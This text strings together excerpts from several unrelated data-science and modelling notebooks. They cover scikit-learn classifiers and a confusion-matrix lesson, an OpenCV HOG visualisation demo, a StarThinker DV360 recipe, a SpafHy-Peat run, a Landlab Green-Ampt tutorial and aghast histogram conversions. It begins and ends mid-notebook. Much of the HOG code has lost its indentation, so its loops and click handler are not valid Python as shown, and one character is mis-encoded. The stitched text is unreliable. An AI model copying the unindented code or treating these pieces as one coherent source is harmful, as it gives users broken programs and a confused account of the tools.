print(svm_model._estimator_type)
svm_model.fit(X_train, y_train)
y_pred = svm_model.predict(X_test)
print(classification_report(y_test, y_pred))
from sklearn.linear_model import SGDClassifier
sgd_model = SGDClassifier()
print(sgd_model._estimator_type)
sgd_model.fit(X_train, y_train)
y_pred = sgd_model.predict(X_test)
print(classification_report(y_test, y_pred))
# Logistic Regression
from sklearn.linear_model import LogisticRegression
logistic_model = LogisticRegression()
print(logistic_model._estimator_type)
logistic_model.fit(X_train, y_train)
y_pred = logistic_model.predict(X_test)
print(classification_report(y_test, y_pred))
```
Confusion matrix
```
from sklearn.datasets import load_digits
digits = load_digits()
digits.keys()
digits_data = digits.data
digits_data.shape
digits_data[0]
#Import matplotlib to look at the images
import matplotlib.pyplot as plt
%matplotlib inline
plt.imshow(digits.data[0].reshape(8,8), cmap='gray')
plt.axis('off')
plt.show()
#Check several images at once
for i in range(10):
    plt.subplot(2, 5, i+1)
    plt.imshow(digits.data[i].reshape(8,8), cmap='gray')
    plt.axis('off')
plt.show()
#What about the target data?
digits_label = digits.target
print(digits_label.shape)
digits_label[:20]
#To see the pitfall of accuracy, turn this into the problem of deciding whether an image is a 3 or not
#Output 3 if the input data is a 3, and 0 for any other digit
new_label = [3 if i == 3 else 0 for i in digits_label]
new_label[:20]
#Train a Decision Tree again to solve this problem
X_train, X_test, y_train, y_test = train_test_split(digits_data,
                                                    new_label,
                                                    test_size=0.2,
                                                    random_state=15)
decision_tree = DecisionTreeClassifier(random_state=15)
decision_tree.fit(X_train, y_train)
y_pred = decision_tree.predict(X_test)
accuracy = accuracy_score(y_test, y_pred)
accuracy
fake_pred = [0] * len(y_pred)
accuracy = accuracy_score(y_test, fake_pred)
accuracy
```
There are different kinds of correct and incorrect answers!
The way of distinguishing and expressing those kinds of correct and incorrect answers is called the confusion matrix.
```
from sklearn.metrics import confusion_matrix
confusion_matrix(y_test, y_pred)
confusion_matrix(y_test, fake_pred)
from sklearn.metrics import classification_report
print(classification_report(y_test, y_pred))
print(classification_report(y_test, fake_pred))
accuracy_score(y_test, y_pred), accuracy_score(y_test, fake_pred)
```
Looking at the process above, fake_pred never predicted a single 3 correctly,
yet its accuracy is not very different from that of y_pred.
A model's performance should therefore not be evaluated with accuracy alone,
and we have to be especially careful when dealing with data whose labels are distributed in an imbalanced way.
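As a small illustration of why (a snippet added here, not in the original notebook), looking at the recall for the '3' class makes the difference obvious even though the overall accuracies are similar:
```
from sklearn.metrics import recall_score

# Recall for the positive class (label 3): the fraction of actual 3s that were found
print('recall of y_pred   :', recall_score(y_test, y_pred, pos_label=3))
print('recall of fake_pred:', recall_score(y_test, fake_pred, pos_label=3))
# fake_pred never predicts a 3, so its recall for the 3 class is 0.0
```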
# Examples
Below you will find various examples for you to experiment with HOG. For each image, you can modify the `cell_size`, `num_cells_per_block`, and `num_bins` (the number of angular bins in your histograms) to see how those parameters affect the resulting HOG descriptor. These examples will help you build some intuition for what each parameter does and how it can be *tuned* to pick out the amount of detail required. Below is a list of the available images that you can load:
* cat.jpeg
* jeep1.jpeg
* jeep2.jpeg
* jeep3.jpeg
* man.jpeg
* pedestrian_bike.jpeg
* roundabout.jpeg
* scrabble.jpeg
* shuttle.jpeg
* triangle_tile.jpeg
* watch.jpeg
* woman.jpeg
**NOTE**: If you are running this notebook in the Udacity workspace, there is around a 2 second lag in the interactive plot. This means that if you click in the image to zoom in, it will take about 2 seconds for the plot to refresh.
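As a quick back-of-the-envelope illustration (an addition for intuition, not part of the original notebook), the length of the resulting HOG feature vector can be computed directly from these parameters, mirroring the `tot_els` calculation in the code below; the 640 x 480 image size is just an example:
```
def hog_length(img_w, img_h, cell=(8, 8), cells_per_block=(2, 2), stride_cells=(1, 1), bins=9):
    # Number of whole cells that fit in the image
    x_cells, y_cells = img_w // cell[0], img_h // cell[1]
    # Number of block positions in each direction
    bx = (x_cells - cells_per_block[0]) // stride_cells[0] + 1
    by = (y_cells - cells_per_block[1]) // stride_cells[1] + 1
    # Each block contributes one histogram of `bins` values per cell it contains
    return bx * by * cells_per_block[0] * cells_per_block[1] * bins

# e.g. a 640 x 480 image with the parameters used in this notebook
print(hog_length(640, 480))
```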
```
%matplotlib notebook
import cv2
import copy
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
# Set the default figure size
plt.rcParams['figure.figsize'] = [9.8, 9]
# -------------------------- Select the Image and Specify the parameters for our HOG descriptor --------------------------
# Load the image
image = cv2.imread('./images/jeep2.jpeg')
# Cell Size in pixels (width, height). Must be smaller than the size of the detection window
# and must be chosen so that the resulting Block Size is smaller than the detection window.
cell_size = (8, 8)
# Number of cells per block in each direction (x, y). Must be chosen so that the resulting
# Block Size is smaller than the detection window
num_cells_per_block = (2, 2)
# Number of gradient orientation bins
num_bins = 9
# -------------------------------------------------------------------------------------------------------------------------
# Convert the original image to RGB
original_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Convert the original image to gray scale
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Block Size in pixels (width, height). Must be an integer multiple of Cell Size.
# The Block Size must be smaller than the detection window
block_size = (num_cells_per_block[0] * cell_size[0],
num_cells_per_block[1] * cell_size[1])
# Calculate the number of cells that fit in our image in the x and y directions
x_cells = gray_image.shape[1] // cell_size[0]
y_cells = gray_image.shape[0] // cell_size[1]
# Horizontal distance between blocks in units of Cell Size. Must be an integer and it must
# be set such that (x_cells - num_cells_per_block[0]) / h_stride = integer.
h_stride = 1
# Vertical distance between blocks in units of Cell Size. Must be an integer and it must
# be set such that (y_cells - num_cells_per_block[1]) / v_stride = integer.
v_stride = 1
# Block Stride in pixels (horizontal, vertical). Must be an integer multiple of Cell Size
block_stride = (cell_size[0] * h_stride, cell_size[1] * v_stride)
# Specify the size of the detection window (Region of Interest) in pixels (width, height).
# It must be an integer multiple of Cell Size and it must cover the entire image. Because
# the detection window must be an integer multiple of cell size, depending on the size of
# your cells, the resulting detection window might be slightly smaller than the image.
# This is perfectly ok.
win_size = (x_cells * cell_size[0] , y_cells * cell_size[1])
# Print the shape of the gray scale image for reference
print('\nThe gray scale image has shape: ', gray_image.shape)
print()
# Print the parameters of our HOG descriptor
print('HOG Descriptor Parameters:\n')
print('Window Size:', win_size)
print('Cell Size:', cell_size)
print('Block Size:', block_size)
print('Block Stride:', block_stride)
print('Number of Bins:', num_bins)
print()
# Set the parameters of the HOG descriptor using the variables defined above
hog = cv2.HOGDescriptor(win_size, block_size, block_stride, cell_size, num_bins)
# Compute the HOG Descriptor for the gray scale image
hog_descriptor = hog.compute(gray_image)
# Calculate the total number of blocks along the width of the detection window
tot_bx = np.uint32(((x_cells - num_cells_per_block[0]) / h_stride) + 1)
# Calculate the total number of blocks along the height of the detection window
tot_by = np.uint32(((y_cells - num_cells_per_block[1]) / v_stride) + 1)
# Calculate the total number of elements in the feature vector
tot_els = (tot_bx) * (tot_by) * num_cells_per_block[0] * num_cells_per_block[1] * num_bins
# Reshape the feature vector to [blocks_y, blocks_x, num_cells_per_block_x, num_cells_per_block_y, num_bins].
# The blocks_x and blocks_y will be transposed so that the first index (blocks_y) refers to the row number
# and the second index to the column number. This will be useful later when we plot the feature vector, so
# that the feature vector indexing matches the image indexing.
hog_descriptor_reshaped = hog_descriptor.reshape(tot_bx,
tot_by,
num_cells_per_block[0],
num_cells_per_block[1],
num_bins).transpose((1, 0, 2, 3, 4))
# Create an array that will hold the average gradients for each cell
ave_grad = np.zeros((y_cells, x_cells, num_bins))
# Create an array that will count the number of histograms per cell
hist_counter = np.zeros((y_cells, x_cells, 1))
# Add up all the histograms for each cell and count the number of histograms per cell
for i in range (num_cells_per_block[0]):
for j in range(num_cells_per_block[1]):
ave_grad[i:tot_by + i,
j:tot_bx + j] += hog_descriptor_reshaped[:, :, i, j, :]
hist_counter[i:tot_by + i,
j:tot_bx + j] += 1
# Calculate the average gradient for each cell
ave_grad /= hist_counter
# Calculate the total number of vectors we have in all the cells.
len_vecs = ave_grad.shape[0] * ave_grad.shape[1] * ave_grad.shape[2]
# Create an array of num_bins angles equally spaced between 0 and 180 degrees, expressed in radians.
deg = np.linspace(0, np.pi, num_bins, endpoint = False)
# Each cell will have a histogram with num_bins. For each cell, plot each bin as a vector (with its magnitude
# equal to the height of the bin in the histogram, and its angle corresponding to the bin in the histogram).
# To do this, create rank 1 arrays that will hold the (x,y)-coordinate of all the vectors in all the cells in the
# image. Also, create the rank 1 arrays that will hold all the (U,V)-components of all the vectors in all the
# cells in the image. Create the arrays that will hold all the vector positions and components.
U = np.zeros((len_vecs))
V = np.zeros((len_vecs))
X = np.zeros((len_vecs))
Y = np.zeros((len_vecs))
# Set the counter to zero
counter = 0
# Use the cosine and sine functions to calculate the vector components (U,V) from their magnitudes. Remember the
# cosine and sine functions take angles in radians. Calculate the vector positions and magnitudes from the
# average gradient array
for i in range(ave_grad.shape[0]):
for j in range(ave_grad.shape[1]):
for k in range(ave_grad.shape[2]):
U[counter] = ave_grad[i,j,k] * np.cos(deg[k])
V[counter] = ave_grad[i,j,k] * np.sin(deg[k])
X[counter] = (cell_size[0] / 2) + (cell_size[0] * i)
Y[counter] = (cell_size[1] / 2) + (cell_size[1] * j)
counter = counter + 1
# Create the bins in degrees to plot our histogram.
angle_axis = np.linspace(0, 180, num_bins, endpoint = False)
angle_axis += ((angle_axis[1] - angle_axis[0]) / 2)
# Create a figure with 4 subplots arranged in 2 x 2
fig, ((a,b),(c,d)) = plt.subplots(2,2)
# Set the title of each subplot
a.set(title = 'Gray Scale Image\n(Click to Zoom)')
b.set(title = 'HOG Descriptor\n(Click to Zoom)')
c.set(title = 'Zoom Window', xlim = (0, 18), ylim = (0, 18), autoscale_on = False)
d.set(title = 'Histogram of Gradients')
# Plot the gray scale image
a.imshow(gray_image, cmap = 'gray')
a.set_aspect(aspect = 1)
# Plot the feature vector (HOG Descriptor)
b.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 5)
b.invert_yaxis()
b.set_aspect(aspect = 1)
b.set_facecolor('black')
# Define function for interactive zoom
def onpress(event):
#Unless the left mouse button is pressed do nothing
if event.button != 1:
return
# Only accept clicks for subplots a and b
if event.inaxes in [a, b]:
# Get mouse click coordinates
x, y = event.xdata, event.ydata
# Select the cell closest to the mouse click coordinates
cell_num_x = np.uint32(x / cell_size[0])
cell_num_y = np.uint32(y / cell_size[1])
# Set the edge coordinates of the rectangle patch
edgex = x - (x % cell_size[0])
edgey = y - (y % cell_size[1])
        # Create a rectangle patch that matches the cell selected above
rect = patches.Rectangle((edgex, edgey),
cell_size[0], cell_size[1],
linewidth = 1,
edgecolor = 'magenta',
facecolor='none')
# A single patch can only be used in a single plot. Create copies
# of the patch to use in the other subplots
rect2 = copy.copy(rect)
rect3 = copy.copy(rect)
# Update all subplots
a.clear()
a.set(title = 'Gray Scale Image\n(Click to Zoom)')
a.imshow(gray_image, cmap = 'gray')
a.set_aspect(aspect = 1)
a.add_patch(rect)
b.clear()
b.set(title = 'HOG Descriptor\n(Click to Zoom)')
b.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 5)
b.invert_yaxis()
b.set_aspect(aspect = 1)
b.set_facecolor('black')
b.add_patch(rect2)
c.clear()
c.set(title = 'Zoom Window')
c.quiver(Y, X, U, V, color = 'white', headwidth = 0, headlength = 0, scale_units = 'inches', scale = 1)
c.set_xlim(edgex - cell_size[0], edgex + (2 * cell_size[0]))
c.set_ylim(edgey - cell_size[1], edgey + (2 * cell_size[1]))
c.invert_yaxis()
c.set_aspect(aspect = 1)
c.set_facecolor('black')
c.add_patch(rect3)
d.clear()
d.set(title = 'Histogram of Gradients')
d.grid()
d.set_xlim(0, 180)
d.set_xticks(angle_axis)
d.set_xlabel('Angle')
d.bar(angle_axis,
ave_grad[cell_num_y, cell_num_x, :],
180 // num_bins,
align = 'center',
alpha = 0.5,
linewidth = 1.2,
edgecolor = 'k')
fig.canvas.draw()
# Create a connection between the figure and the mouse click
fig.canvas.mpl_connect('button_press_event', onpress)
plt.show()
```
#1. Install Dependencies
First install the libraries needed to execute recipes. This only needs to be done once; then click play.
```
!pip install git+https://github.com/google/starthinker
```
#2. Get Cloud Project ID
Running this recipe [requires a Google Cloud Project](https://github.com/google/starthinker/blob/master/tutorials/cloud_project.md). This only needs to be done once; then click play.
```
CLOUD_PROJECT = 'PASTE PROJECT ID HERE'
print("Cloud Project Set To: %s" % CLOUD_PROJECT)
```
#3. Get Client Credentials
Reading and writing to various endpoints requires [downloading client credentials](https://github.com/google/starthinker/blob/master/tutorials/cloud_client_installed.md). This only needs to be done once; then click play.
```
CLIENT_CREDENTIALS = 'PASTE CREDENTIALS HERE'
print("Client Credentials Set To: %s" % CLIENT_CREDENTIALS)
```
#4. Enter DV360 Bulk Editor Parameters
Allows bulk editing DV360 through Sheets and BigQuery.
1. Select <b>Load Partners</b>, then click <b>Save + Run</b>, then a sheet called DV Editor will be created.
1. In the <b>Partners</b> sheet tab, fill in <i>Filter</i> column then select <b>Load Advertisers</b>, click <b>Save + Run</b>.
1. In the <b>Advertisers</b> sheet tab, fill in <i>Filter</i> column then select <b>Load Campaigns</b>, click <b>Save + Run</b>.
1. In the <b>Campaigns</b> sheet tab, fill in <i>Filter</i> column, optional.
1. Then select <b>Load Insertion Orders And Line Items</b>, click <b>Save + Run</b>.
1. To update values, make changes on all <i>Edit</i> columns.
1. Select <i>Preview</i>, then <b>Save + Run</b>.
1. Check the <b>Audit</b> and <b>Preview</b> tabs to verify commit.
1. To commit changes, select <i>Update</i>, then <b>Save + Run</b>.
1. Check the <b>Success</b> and <b>Error</b> tabs.
1. Update can be run multiple times.
1. Update ONLY changes fields that do not match their original value.
1. Insert operates only on Edit columns and ignores original value columns.
1. Be careful when using drag to copy rows; values are incremented automatically.
1. Modify audit logic by visiting BigQuery and changing the views.
Modify the values below for your use case. This can be done multiple times; then click play.
```
FIELDS = {
'auth_dv': 'user', # Credentials used for dv.
'auth_sheet': 'user', # Credentials used for sheet.
'auth_bigquery': 'service', # Credentials used for bigquery.
'recipe_name': '', # Name of Google Sheet to create.
'recipe_slug': '', # Name of Google BigQuery dataset to create.
'command': 'Load Partners', # Action to take.
}
print("Parameters Set To: %s" % FIELDS)
```
#5. Execute DV360 Bulk Editor
This does NOT need to be modified unless you are changing the recipe; just click play.
```
from starthinker.util.project import project
from starthinker.script.parse import json_set_fields
USER_CREDENTIALS = '/content/user.json'
TASKS = [
{
'dataset': {
'__comment__': 'Ensure dataset exists.',
'auth': 'user',
'dataset': {'field': {'name': 'recipe_slug','prefix': 'DV_Editor_','kind': 'string','order': 2,'default': '','description': 'Name of Google BigQuery dataset to create.'}}
}
},
{
'drive': {
'__comment__': 'Copy the default template to sheet with the recipe name',
'auth': 'user',
'copy': {
'source': 'https://docs.google.com/spreadsheets/d/18G6cGo4j5SsY08H8P53R22D_Pm6m-zkE6APd3EDLf2c/',
'destination': {'field': {'name': 'recipe_name','prefix': 'DV Editor ','kind': 'string','order': 3,'default': '','description': 'Name of Google Sheet to create.'}}
}
}
},
{
'dv_editor': {
'__comment': 'Depending on users choice, execute a different part of the solution.',
'auth_dv': {'field': {'name': 'auth_dv','kind': 'authentication','order': 1,'default': 'user','description': 'Credentials used for dv.'}},
'auth_sheets': {'field': {'name': 'auth_sheet','kind': 'authentication','order': 2,'default': 'user','description': 'Credentials used for sheet.'}},
'auth_bigquery': {'field': {'name': 'auth_bigquery','kind': 'authentication','order': 3,'default': 'service','description': 'Credentials used for bigquery.'}},
'sheet': {'field': {'name': 'recipe_name','prefix': 'DV Editor ','kind': 'string','order': 4,'default': '','description': 'Name of Google Sheet to create.'}},
'dataset': {'field': {'name': 'recipe_slug','prefix': 'DV_Editor_','kind': 'string','order': 5,'default': '','description': 'Name of Google BigQuery dataset to create.'}},
'command': {'field': {'name': 'command','kind': 'choice','choices': ['Clear Partners','Clear Advertisers','Clear Campaigns','Clear Insertion Orders and Line Items','Clear Preview','Clear Update','Load Partners','Load Advertisers','Load Campaigns','Load Insertion Orders and Line Items','Preview','Update'],'order': 6,'default': 'Load Partners','description': 'Action to take.'}}
}
}
]
json_set_fields(TASKS, FIELDS)
project.initialize(_recipe={ 'tasks':TASKS }, _project=CLOUD_PROJECT, _user=USER_CREDENTIALS, _client=CLIENT_CREDENTIALS, _verbose=True, _force=True)
project.execute(_force=True)
```
### Example of SpafHy-Peat model run
In this example the model is run with the general parameters defined in [parameters.py](parameters.py), the node-specific parameters in [example_inputs/parameters/](example_inputs/parameters/) and the forcing data files in [example_inputs/forcing/](example_inputs/forcing/). The simulation is for 1000 nodes and covers 10 years. Node-specific parameters include:
- [cf.dat](example_inputs/parameters/cf.dat): canopy closure [-]
- [hc.dat](example_inputs/parameters/hc.dat): stand height [m]
- [LAI_decid.dat](example_inputs/parameters/LAI_decid.dat), [LAI_conif.dat](example_inputs/parameters/LAI_conif.dat): one-sided leaf area index of deciduous trees and conifers [m2/m2]
- [ditch_depth.dat](example_inputs/parameters/ditch_depth.dat): ditch depth [m]
- [ditch_spacing.dat](example_inputs/parameters/ditch_spacing.dat): ditch spacing [m]
- [latitude.dat](example_inputs/parameters/latitude.dat), [longitude.dat](example_inputs/parameters/longitude.dat): latitude and longitude [deg]
- [soil_id.dat](example_inputs/parameters/soil_id.dat): id connecting node to soil profile parameterization (see parameters.peat_soilprofiles)
- [forcing_id.dat](example_inputs/parameters/forcing_id.dat): id connecting node to forcing file in forcing folder
[cf.dat](example_inputs/parameters/cf.dat), [hc.dat](example_inputs/parameters/hc.dat), [LAI_decid.dat](example_inputs/parameters/LAI_decid.dat), [LAI_conif.dat](example_inputs/parameters/LAI_conif.dat) can alternatively be given for each year separately to represent stand development (the value in each column represents one year). In this case, pgen['stand_development'] needs to be set to True in [parameters.py](parameters.py).
The model can also be run with a single forcing file, a single stand parameterization, or a single soil parameterization. For these alternatives, see [parameters.py](parameters.py).
##### Running model
```
from model_driver import driver
outputfile = driver(create_ncf=True, folder='example_inputs')
```
##### Reading results
Model results are written to a netCDF4 file, which can be read into an xarray dataset. The output variables stored during the simulation can be controlled in parameters.py.
```
from iotools import read_results
results = read_results(outputfile)
print(results)
```
##### Plotting some results
The figures show ground water level [m] and canopy transpiration [mm/d] for the first 10 nodes.
```
fig = results['soil_ground_water_level'][:,0,:10].plot.line(x='date')
fig = results['canopy_transpiration'][:,0,:10].plot.line(x='date')
```
# Green-Ampt infiltration and kinematic wave overland flow
This tutorial shows how to create a simple model of rainfall, infiltration, runoff, and overland flow, using two hydrologic components: `SoilInfiltrationGreenAmpt` and `KinwaveImplicitOverlandFlow`.
*(Greg Tucker, September 2021)*
```
import numpy as np
import matplotlib.pyplot as plt
from landlab import imshow_grid, RasterModelGrid
from landlab.io import read_esri_ascii
from landlab.components import SoilInfiltrationGreenAmpt, KinwaveImplicitOverlandFlow
```
## Theory
The Green-Ampt method was introduced by Green and Ampt (1911) as a means of approximating the rate of water infiltration into soil from a layer of surface water. The method represents infiltration in terms of a wetting front that descends into the soil as infiltration progresses. A description of the method can be found in many hydrology textbooks, and in various online resources. The following is a brief summary, using the notation of Julien et al. (1995). The dimensions of each variable are indicated in square brackets, using the common convention that [L] means length, [M] is mass, and [T] is time.
The Green-Ampt method approximates the rate of water infiltration into the soil, $f$ (dimensions of [L/T], representing water volume per unit surface area). Infiltration is driven by two effects: gravitational force, and downward suction (the "paper towel effect") due to a gradient in moisture at the wetting front. The method treats the infiltration rate as a function of the following parameters:
- $K$ - saturated hydraulic conductivity [L/T]
- $H_f$ - capillary pressure head at the wetting front [L]
- $\phi$ - total soil porosity [-]
- $\theta_r$ - residual saturation [-]
- $\theta_e$ - effective porosity $= \phi - \theta_r$ [-]
- $\theta_i$ - initial soil moisture content [-]
- $M_d$ - moisture deficit $=\theta_e - \theta_i$ [-]
- $F$ - total infiltrated water depth [L]
The equation for infiltration rate is:
$$f = K \left( 1 + \frac{H_fM_d}{F} \right)$$
The first term in parentheses represents gravity and the second represents pore suction. If there were no pore suction effect, water would simply infiltrate downward at a rate equal to the hydraulic conductivity, $K$. The suction effect increases this, but it becomes weaker as the cumulative infiltration depth $F$ grows. Effectively, the second term approximates the pore-pressure gradient, which declines as the wetting front descends.
The version used in this component adds a term for the weight of the surface water with depth $H$:
$$f = K \left( 1 + \frac{H_fM_d}{F} + \frac{H}{F} \right)$$
The component uses a simple forward-difference numerical scheme, with time step duration $\Delta t$, in which the infiltration depth during one step is the lesser of the rate calculated above times $\Delta t$, or the available surface water, $H$:
$$\Delta F = \min( f\Delta t, H)$$
Note that the cumulative infiltration $F$ must be greater than zero in order to avoid division by zero; therefore, one should initialize the `soil_water_infiltration__depth` to a small positive value.
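To make the update rule concrete, here is a minimal NumPy sketch of the forward-difference scheme described above. This is not the Landlab component itself, and the parameter values are placeholders chosen only for illustration.
```
import numpy as np

# Illustrative parameter values (placeholders, not calibrated)
K = 1.0e-6   # saturated hydraulic conductivity [m/s]
Hf = 0.1     # capillary pressure head at the wetting front [m]
Md = 0.3     # moisture deficit = effective porosity - initial moisture [-]
dt = 10.0    # time step [s]

# State: surface-water depth H and cumulative infiltration F (one value per node)
H = np.full(5, 0.02)    # 20 mm of ponded water
F = np.full(5, 1.0e-4)  # start slightly above zero to avoid division by zero


def green_ampt_step(H, F):
    """Advance infiltration by one forward-difference time step."""
    f = K * (1.0 + (Hf * Md) / F + H / F)  # infiltration rate [m/s]
    dF = np.minimum(f * dt, H)             # cannot infiltrate more than the ponded water
    return H - dF, F + dF


H, F = green_ampt_step(H, F)
print(H, F)
```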
## Example
### Read in topography from a sample DEM
This is a lidar digital elevation model (DEM) from the West Bijou Creek escarpment on the Colorado High Plains, coarsened to 5 m grid resolution.
Note: it is convenient to use local grid coordinates rather than UTM coordinates, which are what the DEM provides. Therefore, after reading topography data into a grid called `demgrid`, which uses UTM coordinates, we copy over the elevation data into a second grid (`grid`) of the same dimensions that uses local coordinates (i.e., the lower left corner is (0, 0)).
```
# Read topography into a grid
(demgrid, demelev) = read_esri_ascii(
"bijou_gully_subset_5m_edit_dx_filled.asc", name="topographic__elevation"
)
# Create Landlab model grid and assign the DEM elevations to it,
# then display the terrain.
# (note: DEM horizontal and vertical units are meters)
grid = RasterModelGrid(
(demgrid.number_of_node_rows, demgrid.number_of_node_columns), xy_spacing=5.0
)
elev = grid.add_zeros("topographic__elevation", at="node")
elev[:] = demelev
imshow_grid(grid, elev, colorbar_label="Elevation (m)")
```
### Simulate a heavy 5-minute storm
The next bits of code use the `SoilInfiltrationGreenAmpt` and `KinwaveImplicitOverlandFlow` components to model infiltration and runoff during a 5-minute, 90 mm/hr storm.
```
# Create and initialize required input fields for infiltration
# component: depth of surface water, and depth (water volume per
# area) of infiltrated water.
depth = grid.add_zeros("surface_water__depth", at="node")
infilt = grid.add_zeros("soil_water_infiltration__depth", at="node")
infilt[:] = 1.0e-4 # small amount infiltrated (0.1 mm)
# Instantiate an infiltration component
ga = SoilInfiltrationGreenAmpt(
grid,
)
# Instantiate an overland flow component
kw = KinwaveImplicitOverlandFlow(
grid, runoff_rate=90.0, roughness=0.1, depth_exp=5.0 / 3.0
)
# Set time step and storm duration
dt = 10.0 # time step, sec
storm_duration = 300.0 # storm duration, sec
report_every = 60.0 # report progress this often
nsteps = int(storm_duration / dt)
next_report = report_every
# Run it for 5 minutes of heavy rain
for i in range(nsteps):
kw.run_one_step(dt)
ga.run_one_step(dt)
if ((i + 1) * dt) >= next_report:
print("Time =", (i + 1) * dt, "sec")
next_report += report_every
```
### Plot the cumulative infiltration
The plot below illustrates how the convergence of water in the branches of the gully network leads to greater infiltration, with less infiltration on steeper slopes and higher points in the landscape.
```
imshow_grid(
grid, 1000.0 * infilt, colorbar_label="Infiltration depth (mm)", cmap="GnBu"
)
```
## Optional parameters
The `SoilInfiltrationGreenAmpt` component provides a variety of parameters that can be set by the user. A list and description of these can be found in the component's `__init__` docstring, which is printed below:
```
print(SoilInfiltrationGreenAmpt.__init__.__doc__)
```
## References
Green, W. H., & Ampt, G. A. (1911). Studies on Soil Physics. The Journal of Agricultural Science, 4(1), 1-24.
Julien, P. Y., Saghafian, B., and Ogden, F. L. (1995) Raster-based hydrologic modeling of spatially-varied surface runoff, J. Am. Water Resour. Assoc., 31, 523-536, doi:10.1111/j.1752-1688.1995.tb04039.x.
Rengers, F. K., McGuire, L. A., Kean, J. W., Staley, D. M., and Hobley, D. (2016) Model simulations of flood and debris flow timing in steep catchments after wildfire, Water Resour. Res., 52, 6041-6061, doi:10.1002/2015WR018176.
# Aghast examples
## Conversions
The main purpose of aghast is to move aggregated, histogram-like statistics (called "ghasts") from one framework to the next. This requires a conversion of high-level domain concepts.
Consider the following example: in Numpy, a histogram is simply a 2-tuple of arrays with special meaningโbin contents, then bin edges.
```
import numpy
numpy_hist = numpy.histogram(numpy.random.normal(0, 1, int(10e6)), bins=80, range=(-5, 5))
numpy_hist
```
We convert that into the aghast equivalent (a "ghast") with a connector (two-function module: `fromnumpy` and `tonumpy`).
```
import aghast.connect.numpy
ghastly_hist = aghast.connect.numpy.fromnumpy(numpy_hist)
ghastly_hist
```
This object is instantiated from a class structure built from simple pieces.
```
ghastly_hist.dump()
```
Now it can be converted to a ROOT histogram with another connector.
```
import aghast.connect.root
root_hist = aghast.connect.root.toroot(ghastly_hist, "root_hist")
root_hist
import ROOT
canvas = ROOT.TCanvas()
root_hist.Draw()
canvas.Draw()
```
And Pandas with yet another connector.
```
import aghast.connect.pandas
pandas_hist = aghast.connect.pandas.topandas(ghastly_hist)
pandas_hist
```
## Serialization
A ghast is also a [Flatbuffers](http://google.github.io/flatbuffers/) object, which has a [multi-lingual](https://google.github.io/flatbuffers/flatbuffers_support.html), [random-access](https://github.com/mzaks/FlatBuffersSwift/wiki/FlatBuffers-Explained), [small-footprint](http://google.github.io/flatbuffers/md__benchmarks.html) serialization:
```
ghastly_hist.tobuffer()
print("Numpy size: ", numpy_hist[0].nbytes + numpy_hist[1].nbytes)
tmessage = ROOT.TMessage()
tmessage.WriteObject(root_hist)
print("ROOT size: ", tmessage.Length())
import pickle
print("Pandas size:", len(pickle.dumps(pandas_hist)))
print("Aghast size: ", len(ghastly_hist.tobuffer()))
```
Aghast is generally foreseen as a memory format, like [Apache Arrow](https://arrow.apache.org), but for statistical aggregations. Like Arrow, it reduces the need to implement $N(N - 1)/2$ conversion functions among $N$ statistical libraries to just $N$ conversion functions. (See the figure on Arrow's website.)
## Translation of conventions
Aghast also intends to be as close to zero-copy as possible. This means that it must make graceful translations among conventions. Different histogramming libraries handle overflow bins in different ways:
```
fromroot = aghast.connect.root.fromroot(root_hist)
fromroot.axis[0].binning.dump()
print("Bin contents length:", len(fromroot.counts.array))
ghastly_hist.axis[0].binning.dump()
print("Bin contents length:", len(ghastly_hist.counts.array))
```
And yet we want to be able to manipulate them as though these differences did not exist.
```
sum_hist = fromroot + ghastly_hist
sum_hist.axis[0].binning.dump()
print("Bin contents length:", len(sum_hist.counts.array))
```
The binning structure keeps track of the existence of underflow/overflow bins and where they are located.
* ROOT's convention is to put underflow before the normal bins (`below1`) and overflow after (`above1`), so that the normal bins are effectively 1-indexed.
* Boost.Histogram's convention is to put overflow after the normal bins (`above1`) and underflow after that (`above2`), so that underflow is accessed via `myhist[-1]` in Numpy.
* Numpy histograms don't have underflow/overflow bins.
* Pandas could have `Intervals` that extend to infinity.
Aghast accepts all of these, so that it doesn't have to manipulate the bin contents buffer it receives, but knows how to deal with them if it has to combine histograms that follow different conventions.
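As a rough illustration of what such a translation involves, the sketch below uses plain NumPy (it is not aghast's internal code) to reorder a ROOT-style counts array, with underflow first and overflow last, into a Boost.Histogram-style layout, with overflow and then underflow after the normal bins; the binning metadata above is what makes this mapping unambiguous.
```
import numpy as np

# ROOT-style layout: [underflow, bin_0, ..., bin_{n-1}, overflow]
root_counts = np.array([3, 10, 20, 30, 40, 7])

# Boost.Histogram-style layout: [bin_0, ..., bin_{n-1}, overflow, underflow]
boost_counts = np.concatenate([root_counts[1:-1],   # normal bins
                               root_counts[-1:],    # overflow
                               root_counts[:1]])    # underflow

print(boost_counts)   # [10 20 30 40  7  3]
```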
## Binning types
All the different axis types have an equivalent in aghast (and not all are single-dimensional).
```
import aghast
aghast.IntegerBinning(5, 10).dump()
aghast.RegularBinning(100, aghast.RealInterval(-5, 5)).dump()
aghast.HexagonalBinning(0, 100, 0, 100, aghast.HexagonalBinning.cube_xy).dump()
aghast.EdgesBinning([0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100]).dump()
aghast.IrregularBinning([aghast.RealInterval(0, 5),
aghast.RealInterval(10, 100),
aghast.RealInterval(-10, 10)],
overlapping_fill=aghast.IrregularBinning.all).dump()
aghast.CategoryBinning(["one", "two", "three"]).dump()
aghast.SparseRegularBinning([5, 3, -2, 8, -100], 10).dump()
aghast.FractionBinning(error_method=aghast.FractionBinning.clopper_pearson).dump()
aghast.PredicateBinning(["signal region", "control region"]).dump()
aghast.VariationBinning([aghast.Variation([aghast.Assignment("x", "nominal")]),
aghast.Variation([aghast.Assignment("x", "nominal + sigma")]),
aghast.Variation([aghast.Assignment("x", "nominal - sigma")])]).dump()
```
The meanings of these binning classes are given in [the specification](https://github.com/diana-hep/aghast/blob/master/specification.adoc#integerbinning), but many of them can be converted into one another, and converting to `CategoryBinning` (strings) often makes the intent clear.
```
aghast.IntegerBinning(5, 10).toCategoryBinning().dump()
aghast.RegularBinning(10, aghast.RealInterval(-5, 5)).toCategoryBinning().dump()
aghast.EdgesBinning([0.01, 0.05, 0.1, 0.5, 1, 5, 10, 50, 100]).toCategoryBinning().dump()
aghast.IrregularBinning([aghast.RealInterval(0, 5),
aghast.RealInterval(10, 100),
